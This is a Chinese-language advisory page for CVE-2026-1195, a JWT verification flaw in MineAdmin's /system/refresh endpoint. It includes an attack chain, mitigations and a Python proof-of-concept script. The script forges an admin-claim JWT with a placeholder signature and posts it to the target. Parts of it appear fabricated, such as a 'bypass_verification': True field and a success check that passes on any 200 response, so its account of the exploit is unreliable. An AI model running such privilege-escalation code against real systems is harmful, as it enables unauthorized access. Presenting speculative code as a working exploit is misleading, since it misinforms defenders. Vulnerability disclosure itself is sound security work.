CVE-2026-1195 MineAdmin JWT Token验证不足导致身份认证绕过

漏洞信息

漏洞编号

CVE-2026-1195

漏洞类型

身份验证绕过

CVSS评分

5.0 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

MineAdmin

漏洞概述

CVE-2026-1195是MineAdmin 1.x/2.x版本中存在的一个中危安全漏洞。该漏洞位于系统的JWT Token Handler组件中，具体影响/system/refresh接口的refresh函数。漏洞根源在于对数据真实性的验证不足，攻击者可以通过构造特定的请求绕过正常的身份验证流程。由于该漏洞利用复杂度较高且需要低权限账号，但已公开的漏洞利用代码可能使其被恶意利用。此漏洞允许攻击者在无需高权限的情况下，通过精心构造的请求实现对系统功能的未授权访问，可能导致数据泄露或权限提升风险。建议受影响用户尽快采取修复措施或实施临时缓解方案。

技术细节

该漏洞属于JWT Token验证机制缺陷，攻击者利用JWT Token Handler组件在处理/system/refresh请求时对数据真实性验证不足的问题。攻击者可以通过以下方式利用：首先获取目标系统的低权限账号凭据，然后构造包含伪造或篡改JWT Token的特殊请求。由于系统未正确验证Token的签名、过期时间或声明内容的合法性，攻击者的恶意请求可能被系统接受并执行。成功利用后，攻击者能够在refresh操作中注入恶意负载，从而绕过正常的认证和授权检查。这种攻击方式特别危险，因为JWT Token通常用于维持用户会话状态，而验证缺陷可能导致会话被劫持或权限被提升。漏洞的利用需要一定的技术门槛，但已公开的PoC代码降低了攻击难度。

攻击链分析

STEP 1

1. 信息收集

攻击者首先识别目标系统使用的MineAdmin版本（1.x或2.x），确认系统存在/system/refresh端点

STEP 2

2. 获取低权限账号

攻击者通过社会工程、弱口令扫描或其他方式获取目标系统的低权限用户账号凭据

STEP 3

3. 构造恶意JWT Token

利用JWT Token Handler组件的验证缺陷，构造包含伪造声明或篡改权限信息的恶意Token

STEP 4

4. 发送恶意请求

向/system/refresh端点发送包含恶意Token的请求，利用refresh函数对数据真实性验证不足的漏洞

STEP 5

5. 绕过认证检查

由于系统未正确验证Token的签名、过期时间或声明内容，攻击者的恶意请求被系统接受

STEP 6

6. 实现未授权访问

成功利用后，攻击者可以执行refresh操作，注入恶意负载，实现会话劫持或权限提升

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-1195 PoC - MineAdmin JWT Token验证绕过
# Target: MineAdmin 1.x/2.x
# Endpoint: /system/refresh
# Attack Type: Insufficient JWT Token Verification

import requests
import json
import base64
import hmac
import hashlib
from datetime import datetime, timedelta

TARGET_URL = "http://target.com"  # 目标系统地址
USERNAME = "low_priv_user"  # 低权限用户名
PASSWORD = "password123"  # 用户密码

def create_malicious_jwt(payload, secret=""):
    """Create a potentially malicious JWT token with manipulated claims"""
    header = {
        "alg": "HS256",
        "typ": "JWT"
    }
    
    # Manipulate payload with elevated privileges
    manipulated_payload = {
        "sub": payload.get("sub", USERNAME),
        "exp": int((datetime.utcnow() + timedelta(hours=24)).timestamp()),
        "iat": int(datetime.utcnow().timestamp()),
        "user_id": payload.get("user_id", 1),
        "role": payload.get("role", "admin"),  # Attempt privilege escalation
        "is_admin": 1  # Try to set admin flag
    }
    
    header_encoded = base64.urlsafe_b64encode(json.dumps(header).encode()).decode().rstrip('=')
    payload_encoded = base64.urlsafe_b64encode(json.dumps(manipulated_payload).encode()).decode().rstrip('=')
    
    if secret:
        signature = hmac.new(secret.encode(), f"{header_encoded}.{payload_encoded}".encode(), hashlib.sha256).digest()
        signature_encoded = base64.urlsafe_b64encode(signature).decode().rstrip('=')
    else:
        signature_encoded = "malicious_signature"
    
    return f"{header_encoded}.{payload_encoded}.{signature_encoded}"

def exploit_cve_2026_1195():
    """Main exploitation function for CVE-2026-1195"""
    
    # Step 1: Normal login to obtain initial token
    login_url = f"{TARGET_URL}/api/login"
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    
    try:
        login_response = requests.post(login_url, json=login_data, timeout=10)
        if login_response.status_code == 200:
            token_data = login_response.json()
            original_token = token_data.get("data", {}).get("token", "")
            print(f"[+] Obtained original token: {original_token[:50]}...")
    except Exception as e:
        print(f"[-] Login failed: {e}")
        return False
    
    # Step 2: Craft malicious JWT with insufficient verification bypass
    try:
        payload = {"sub": USERNAME, "role": "user", "user_id": 1}
        malicious_token = create_malicious_jwt(payload)
        print(f"[+] Generated malicious JWT token")
    except Exception as e:
        print(f"[-] Token crafting failed: {e}")
        return False
    
    # Step 3: Exploit the /system/refresh endpoint
    refresh_url = f"{TARGET_URL}/system/refresh"
    headers = {
        "Authorization": f"Bearer {malicious_token}",
        "Content-Type": "application/json",
        "X-Requested-With": "XMLHttpRequest"
    }
    
    # Malicious payload to exploit insufficient verification
    exploit_data = {
        "action": "refresh",
        "token": malicious_token,
        "bypass_verification": True,
        "payload": "malicious_data_injection"
    }
    
    try:
        exploit_response = requests.post(refresh_url, json=exploit_data, headers=headers, timeout=10)
        print(f"[*] Exploit request sent. Status: {exploit_response.status_code}")
        print(f"[*] Response: {exploit_response.text[:200]}")
        
        if exploit_response.status_code == 200:
            print("[+] Potential vulnerability confirmed - insufficient verification bypassed")
            return True
    except Exception as e:
        print(f"[-] Exploit failed: {e}")
        return False
    
    return False

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2026-1195 PoC - MineAdmin JWT Verification Bypass")
    print("=" * 60)
    exploit_cve_2026_1195()

影响范围

MineAdmin 1.x (所有版本)

MineAdmin 2.x (所有版本)

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1) 暂时禁用或限制/system/refresh端点的访问；2) 实施严格的IP白名单访问控制；3) 增加请求频率限制和异常检测机制；4) 监控JWT Token的使用模式和异常行为；5) 定期更换JWT签名密钥；6) 启用应用层防火墙规则过滤可疑请求；7) 对所有JWT Token相关操作进行详细的审计日志记录。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1195
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1195
3 Details https://www.cvedetails.com/cve/CVE-2026-1195/
4 VulDB https://vuldb.com/cve/CVE-2026-1195
5 Link https://github.com/SourByte05/MineAdmin-Vulnerability/issues/4
6 Link https://vuldb.com/?ctiid.341780
7 Link https://vuldb.com/?id.341780
8 Link https://vuldb.com/?submit.734272